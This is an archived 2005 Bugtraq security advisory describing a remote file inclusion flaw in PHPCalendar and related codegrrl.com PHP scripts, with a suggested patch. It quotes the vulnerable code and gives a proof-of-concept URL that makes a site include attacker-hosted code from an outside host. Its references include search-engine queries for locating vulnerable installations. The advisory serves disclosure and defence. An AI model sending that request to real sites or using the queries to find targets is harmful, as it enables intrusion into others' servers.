lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20051113115117.8031.qmail@securityfocus.com>
Date: 13 Nov 2005 11:51:17 -0000
From: r.verton@...il.com
To: bugtraq@...urityfocus.com
Subject: PHPCalendar (and some more codegrrl.com products) arbitrary code
 execution


PHPCalendar (and some more codegrrl.com products) arbitrary code execution
==========================================================================


   Software: PHPCalendar, PHPClique, PHPFanBase, PHPCurrently, PHPQuotes
   Severity: Arbitrary code execution
   Risk: High
   Author: Robin Verton <r.verton@...il.com>
   Date: Sep. 24 2005
   Vendor: codegrrl.com [contacted]


   Description:

	Written in PHP/MySQL, PHPCalendar is a script designed especially to help webmasters to mantain a calendar, with all upcoming events and birthdays.
	It was designed to be used at personal sites, but it can also be very useful for fansites, to keep track of tours, premiers, awards shows, 
	tv apearances, interviews, magazines features, and many more! You can see it in use at unfloopy.net.
	[http://www.codegrrl.com/]


   Details:

	1) protection.php (with register_globals = On)
	   If register_globals is on an attacker can include an arbitrary php file to execute malicious code.
	


	   $logout_page = "$siteurl";

	   [...]

	   if ($action == "logout")
	   {
        	Setcookie("logincookie[pwd]","",time() -86400);
        	Setcookie("logincookie[user]","",time() - 86400);
        	@include($logout_page);
		exit;
	   }

   Proof of Concept:

	   To exploit this vulnerability an attacker only has to use the following HTTP-Request:
	   http://www.example.com/protection.php?action=logout&siteurl=http://yourhost.com/malicoius-code.txt

   Patch:
           Set register_globals in the php.ini off or disallow direct access to the protection.php f.e. define constants and use
           code like 

	   if( !defined('IN_SYS') ) {
	   	die('Hacking attempt');
	   } 

	   to prevent the direct access
  
   Credits:

       Credit goes to Robin Verton, 15 years old from Germany

   References:

       [1] http://codegrrl.com
       [2] http://www.google.com/search?q=%22Powered+by%3A+PHPFanBase%22 [about 112,000 results]
       [3] http://www.google.com/search?q=%22Powered+by%3A+PHPCalendar%22 [about 44,000 results]
       [4] http://www.google.com/search?q=%22Powered+by%3A+PHPCurrently%22 [about 44,000 results]
       [5] http://www.google.com/search?q=%22Powered+by%3A+PHPClique%22 
       [6] http://www.google.com/search?q=%22Powered+by%3A+PHPQuotes%22


   





Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ